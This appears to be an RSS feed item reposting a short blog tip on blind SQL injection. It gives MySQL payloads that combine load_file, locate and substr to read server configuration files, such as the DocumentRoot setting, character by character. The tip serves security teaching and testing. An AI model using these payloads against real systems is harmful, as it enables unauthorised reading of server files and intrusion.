<p>If you know what you are looking for in a file (and mostly you do) you can easily find the correct offset with <em>LOCATE(substr,str[,pos])</em> which will return the offset of a given substring found in a string. The following query instantly returns the next 10 characters after the <em>DocumentRoot</em> setting:</p>
<div id="highlighter_35942">
<div>substr(load_file(&#8216;file&#8217;),locate(&#8216;DocumentRoot&#8217;,(load_file(&#8216;file&#8217;)))+length(&#8216;DocumentRoot&#8217;),10)</div>
<div>and can then be bruteforced easily:</div>
</div>
<div>mid(lower(substr(load_file(&#8216;file&#8217;),locate(&#8216;DocumentRoot&#8217;,(load_file(&#8216;file&#8217;)))+length(&#8216;DocumentRoot&#8217;),10)),$k,1)=0x$char</div>
<div>No magic here, but a helpful combination of mysql build in functions when reading files blindly.</div>
<p>https://websec.wordpress.com/2010/10/01/blind-sql-injection-with-load_file/</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/andiwijaya.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/andiwijaya.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/andiwijaya.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/andiwijaya.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/andiwijaya.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/andiwijaya.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/andiwijaya.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/andiwijaya.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/andiwijaya.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/andiwijaya.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/andiwijaya.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/andiwijaya.wordpress.com/173/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/andiwijaya.wordpress.com/173/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/andiwijaya.wordpress.com/173/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=andiwijaya.wordpress.com&amp;blog=836339&amp;post=173&amp;subd=andiwijaya&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://andiwijaya.wordpress.com/2011/09/15/blind-sql-injection-with-load_file/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0a4646472c465eeb00190a40d7a185ae?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">Andi</media:title>
		</media:content>

		<media:content url="https://s-ssl.wordpress.com/wp-includes/images/smilies/icon_wink.gif" medium="image">
			<media:title type="html">;)</media:title>
		</media:content>
	</item>
	</channel>
</rss>
